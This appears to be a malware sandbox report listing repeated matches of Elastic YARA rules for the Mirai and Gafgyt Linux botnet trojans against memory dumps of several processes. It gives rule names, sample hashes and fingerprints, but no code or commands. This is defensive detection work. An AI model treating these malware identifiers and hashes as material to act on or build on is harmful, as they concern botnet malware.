Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
